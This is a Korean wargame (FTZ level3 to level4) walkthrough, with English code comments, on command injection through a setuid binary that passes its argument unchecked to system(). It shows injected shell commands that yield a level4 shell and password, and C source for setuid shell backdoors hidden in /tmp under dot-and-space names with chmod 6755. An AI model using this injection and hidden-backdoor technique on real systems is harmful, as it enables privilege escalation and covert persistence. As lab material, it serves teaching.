

04_Level3 -> Level4[FTZ] system() 함수의 취약점 분석

 


■ Level3 -> Level4  


 

목적

system() 함수의 취약점 

 

 

Level4 문제에 도전하기

 

level3 사용자로 로그인

-> ID/PASS: level3/can you fly?

 

[level3@ftz level3]$ ls -l

 

합계 12

-rw-r--r-- 1 root root 543 11월 26 2000 hint

drwxr-xr-x 2 root level3 4096 2월 24 2002 public_html

drwxrwxr-x 2 root level3 4096 115 2009 tmp

 

 

[level3@ftz level3]$ cat hint

 

다음 코드는 autodig의 소스이다.

 

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

 

/*
 * autodig (the source given in the level3 hint). Builds the command line
 *   dig @<argv[1]> version.bind chaos txt
 * and runs it through system(). The installed binary is setuid level4
 * (-rwsr-x--- level4 level3, see the ls -l output further down), so every
 * command the shell runs from here executes with euid=level4.
 *
 * Two defects make this exploitable:
 *  1. argv[1] is spliced into a shell command line without any validation.
 *     system() hands the string to /bin/sh -c, so shell metacharacters in
 *     argv[1] (';', '|', '&&', backticks, $(...)) start additional commands
 *     that inherit level4's effective uid.
 *  2. strcpy/strcat never check the size of cmd[100]: "dig @" (5 bytes) plus
 *     " version.bind chaos txt" (23 bytes) plus the NUL leave room for only
 *     71 bytes of argv[1]; anything longer overruns the stack buffer.
 * Also note: strcpy/strcat need <string.h>, which the hint does not include,
 * and main falls off the end without a return statement.
 */
int main(int argc, char **argv){

  char cmd[100];

  if( argc!=2 ){                       // exactly one argument is required
      printf( "Auto Digger Version 0.9\n" );
      printf( "Usage : %s host\n", argv[0] );
      exit(0);
  }

  strcpy( cmd, "dig @" );
  strcat( cmd, argv[1] );               // first argument = server IP; no content or length check
  strcat( cmd, " version.bind chaos txt");

  system( cmd );                        // e.g. dig @168.126.63.1 version.bind chaos txt, run via /bin/sh -c

}

 

이를 이용하여 level4의 권한을 얻어라.

 

more hints.

- 동시에 여러 명령어를 사용하려면?

- 문자열 형태로 명령어를 전달하려면?

 

 

소스 코드를 통해 알 수 있는 내용

인자가 정확히 하나일 때 실제로 실행되는 셸 명령은 `dig @<인자> version.bind chaos txt` 이며, 인자가 168.126.63.1이면 `dig @168.126.63.1 version.bind chaos txt` 가 된다. 인자는 아무 검사 없이 그대로 문자열에 이어 붙는다.

 


 

[level3@ftz level3]$ find / -name autodig 2>/dev/null

 

/bin/autodig

 

 

[level3@ftz level3]$ ls -l /bin/autodig

 

-rwsr-x--- 1 level4 level3 12194 8월 19 12:58 /bin/autodig

 

 

[level3@ftz level3]$ find / -user level4 -perm -4000 2>/dev/null

 

/bin/autodig

 

[level3@ftz level3]$ /bin/autodig 168.126.63.1

 

; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt

;; global options:  printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42564

;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0


;; QUESTION SECTION:

;version.bind.                  CH      TXT


;; ANSWER SECTION:

version.bind.           0       CH      TXT     "Unknown"


;; AUTHORITY SECTION:

version.bind.           0       CH      NS      version.bind.


;; Query time: 20 msec

;; SERVER: 168.126.63.1#53(168.126.63.1)

;; WHEN: Thu Aug 21 22:02:45 2014

;; MSG SIZE  rcvd: 83

 

 

------------- /bin/autodig ----------------

     strcpy( cmd, "dig @" );

     strcat( cmd, argv[1] );

     strcat( cmd, " version.bind chaos txt");

     system( cmd );

------------- /bin/autodig ----------------

# /bin/autodig 168.126.63.1

# dig @168.126.63.1 version.bind chaos txt 코드해석결과

  


[level3@ftz level3]$ dig @168.126.63.1 version.bind chaos txt

 

; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt

;; global options: printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8087

;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

 

;; QUESTION SECTION:

;version.bind. CH TXT

 

;; ANSWER SECTION:

version.bind.      0      CH      TXT      "Unknown"

 

;; AUTHORITY SECTION:

version.bind.      0      CH      NS       version.bind.

 

;; Query time: 31 msec

;; SERVER: 168.126.63.1#53(168.126.63.1)

;; WHEN: Thu Aug 21 22:03:36 2014

;; MSG SIZE rcvd: 64

 

 

system() 함수는 전달받은 문자열을 검사 없이 그대로 /bin/sh -c 에 넘긴다. 따라서 argv[1]에 ; | && ` $( ) 같은 셸 메타문자가 들어 있으면 셸이 이를 명령 구분자로 해석해 추가 명령을 실행하며, autodig가 setuid level4이므로 그 명령들도 level4의 유효 UID로 실행된다. 프로그램 어디에서도 argv[1]의 내용이나 길이(cmd[100] 버퍼 크기)를 점검하지 않는다.

 

------------- /bin/autodig ----------------

strcpy( cmd, "dig @" );

strcat( cmd, argv[1] );

strcat( cmd, " version.bind chaos txt");

system( cmd );

------------- /bin/autodig ----------------

# /bin/autodig "168.126.63.1 www.naver.com; id;"        큰따옴표로 묶었으므로 전체 문자열이 argv[1] 하나로 전달되어 argc==2 검사를 통과한다.

# dig @168.126.63.1 www.naver.com; id; version.bind chaos txt

 

[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; id;"

 

; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com

;; global options:  printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58915

;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3


;; QUESTION SECTION:

;www.naver.com.                 IN      A


;; ANSWER SECTION:

www.naver.com.          0       IN      CNAME   www.naver.com.nheos.com.

www.naver.com.nheos.com. 27     IN      A       202.179.177.22

www.naver.com.nheos.com. 27     IN      A       125.209.222.141


;; AUTHORITY SECTION:

nheos.com.              16451   IN      NS      ns3.nheos.com.

nheos.com.              16451   IN      NS      ns1.nheos.com.

nheos.com.              16451   IN      NS      ns2.nheos.com.


;; ADDITIONAL SECTION:

ns1.nheos.com.          17674   IN      A       119.205.240.148

ns2.nheos.com.          16451   IN      A       61.247.202.50

ns3.nheos.com.          2641    IN      A       175.158.30.74


;; Query time: 4 msec

;; SERVER: 168.126.63.1#53(168.126.63.1)

;; WHEN: Mon Nov 30 14:50:27 2015

;; MSG SIZE  rcvd: 199


uid=3004(level4) gid=3003(level3) groups=3003(level3)

sh: line 1: version.bind: command not found

id 의 출력에 uid=3004(level4)로 나오는 이유는 system()이 띄운 셸이 setuid 된 autodig의 유효 UID(level4)를 그대로 물려받기 때문이다. 파일에 setuid 비트만 있고 setgid 비트는 없으므로(-rwsr-x---) gid는 3003(level3) 그대로다. 뒤에 이어 붙는 " version.bind chaos txt" 는 별도의 명령으로 해석되어 "command not found" 오류를 내지만, 주입한 명령은 이미 그 앞에서 실행된 뒤이므로 공격에는 영향이 없다.


 

------------- /bin/autodig ----------------

     strcpy( cmd, "dig @" );

     strcat( cmd, argv[1] );

     strcat( cmd, " version.bind chaos txt");

     system( cmd );

------------- /bin/autodig ----------------

# /bin/autodig "168.126.63.1 www.naver.com; bash;"

# dig @168.126.63.1 www.naver.com; bash; version.bind chaos txt

 

[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; bash;"

 

; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com

;; global options:  printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3364

;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3


;; QUESTION SECTION:

;www.naver.com.                 IN      A


;; ANSWER SECTION:

www.naver.com.          0       IN      CNAME   www.naver.com.nheos.com.

www.naver.com.nheos.com. 115    IN      A       125.209.222.142

www.naver.com.nheos.com. 115    IN      A       125.209.222.141


;; AUTHORITY SECTION:

nheos.com.              20235   IN      NS      ns2.nheos.com.

nheos.com.              20235   IN      NS      ns3.nheos.com.

nheos.com.              20235   IN      NS      ns1.nheos.com.


;; ADDITIONAL SECTION:

ns1.nheos.com.          20235   IN      A       119.205.240.148

ns2.nheos.com.          5661    IN      A       61.247.202.50

ns3.nheos.com.          170849  IN      A       175.158.30.74


;; Query time: 5 msec

;; SERVER: 168.126.63.1#53(168.126.63.1)

;; WHEN: Mon Nov 30 14:51:59 2015

;; MSG SIZE  rcvd: 199

 

 

[level4@ftz level3]$ my-pass

 

 

Level4 Password is "suck my brain".

 

 

 

 

 

 

 

백도어를 생성해 보자.

 

[level4@ftz level3]$ vi /tmp/backdoor.c

 

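/*
 * Setuid shell backdoor, compiled while holding the level4 shell obtained
 * through the autodig command injection. After chmod 6755 (see below) the
 * binary is -rwsr-sr-x level4:level3, so level3 can run it and land in a
 * level4 shell.
 *
 * setreuid(3004, 3004): 3004 is level4's uid as printed by `id` earlier on
 * this page. Both real and effective uid are set, presumably because bash
 * resets euid to ruid when they differ (unless started with -p). The call
 * can fail (e.g. if the setuid bit is lost); the original version ignored
 * that and silently exec'd an unprivileged shell, so the result is checked.
 *
 * execve gets an explicit empty environment (the original passed NULL as
 * envp, which Linux also treats as empty). That is why the spawned bash
 * prints "No value for $TERM": nothing is inherited from the caller.
 * Needs <unistd.h> for the setreuid/execve prototypes.
 */
int main()
{
    char *cmd[2];
    char *const envp[] = { (void *)0 };   /* empty environment */

    cmd[0] = "/bin/bash";
    cmd[1] = (void *)0;                   /* argv must be NULL-terminated */

    if (setreuid(3004, 3004) != 0)
        return 1;                         /* no privilege gained: do not start a shell */

    execve(cmd[0], cmd, envp);
    return 1;                             /* only reached if execve failed */
}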

 

 

[level4@ftz level3]$ gcc -o /tmp/". " /tmp/backdoor.c /* /tmp/". "((.) + 공백 한칸) */

[level4@ftz level3]$ chmod 6755 /tmp/". "

[level4@ftz level3]$ ls -al /tmp

 

drwxrwxrwt    5 root     root         4096 11월 30 14:56 .

-rwsr-sr-x    1 level4   level3      11677 11월 30 14:56 . 

drwxr-xr-x   20 root     root         4096 11월 30 09:44 ..

-r--r--r--    1 root     root           11 11월 30 09:46 .X0-lock

drwxrwxrwt    2 root     root         4096 11월 30 09:46 .X11-unix

srwx------    1 root     nobody          0 11월 27 12:00 .fam_socket

drwxrwxrwt    2 xfs      xfs          4096 11월 30 09:46 .font-unix

srw-rw-rw-    1 root     root            0 11월 30 09:46 .gdm_socket

-rw-r--r--    1 level4   level3        121 11월 30 14:56 backdoor.c

drwx------    2 root     root         4096 11월 27 17:30 orbit-root

-rwxrwxr-x    1 level1   level1      11486 11월 30 10:58 sample

-rw-rw-r--    1 level1   level1        570 11월 30 10:57 sample.a

-rw-rw-r--    1 level1   level1        143 11월 30 10:56 sample.c

 

 

[level4@ftz level3]$ rm -f /tmp/backdoor.c

[level4@ftz level3]$ exit

 

exit

sh: line 1: version.bind: command not found   ← bash 를 빠져나오자 system()의 셸이 남은 문자열 " version.bind chaos txt" 를 다음 명령으로 실행하려다 실패한 것이다.

 

 

[level3@ftz level3]$ id

 

uid=3003(level3) gid=3003(level3) groups=3003(level3)

 

 

[level3@ftz level3]$ /tmp/". "

 

No value for $TERM and no -T specified

No value for $TERM and no -T specified

 

-> backdoor 가 execve()의 envp 로 NULL(빈 환경)을 넘기기 때문에 $TERM 이 없는 상태로 bash 가 실행되어 나오는 경고다. 권한 상승과는 무관하므로 무시한다.

 

[level4@ftz level3]$ id

 

uid=3004(level4) gid=3003(level3) groups=3003(level3)

 

 

[level4@ftz level3]$ exit

[level3@ftz level3]$

 

 

 

다른 방식으로 백도어를 만들어 보자.

 

(EX: # /bin/autodig "127.0.0.1;CMD")

 

/bin/autodig "168.126.63.1 www.naver.com; bash;"

 

/bin/autodig "127.0.0.1;echo 'int main(){char *cmd[2];cmd[0]=\"/bin/sh\";cmd[1]=(void *)0;' > /tmp/backdoor2.c;"

/bin/autodig "127.0.0.1;echo 'setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);}' >> /tmp/backdoor2.c;"

/bin/autodig "127.0.0.1;cat /tmp/backdoor2.c;"

/bin/autodig "127.0.0.1;gcc -o /tmp/'.. ' /tmp/backdoor2.c;"

/bin/autodig "127.0.0.1;chmod 6755 /tmp/'.. ';"

 

(/tmp/backdoor2.c)

 

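/* Verbatim content of /tmp/backdoor2.c as the two echo commands leave it.
 * The \" in those commands is unescaped by the outer double-quoted shell
 * argument before echo runs, so the file contains plain double quotes
 * (a literal \" would make gcc reject the file). Same program as
 * backdoor.c except that it execs /bin/sh. */
int main(){char *cmd[2];cmd[0]="/bin/sh";cmd[1]=(void *)0;
setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);}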

 

 

 

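/*
 * backdoor2.c, reformatted. The \" shown in the raw echo listing is shell
 * escaping, not part of the C source: gcc only accepts the plain "/bin/sh".
 * Behaviour mirrors backdoor.c: set both uids to 3004 (level4) and exec a
 * shell with an empty environment. The setreuid result is checked so a copy
 * that lost its setuid bit fails instead of quietly starting an
 * unprivileged shell. Needs <unistd.h>.
 */
int main()
{
    char *cmd[2];
    char *const envp[] = { (void *)0 };   /* empty environment (original: NULL) */

    cmd[0] = "/bin/sh";
    cmd[1] = (void *)0;                   /* argv terminator */

    if (setreuid(3004, 3004) != 0)
        return 1;

    execve(cmd[0], cmd, envp);
    return 1;                             /* execve only returns on failure */
}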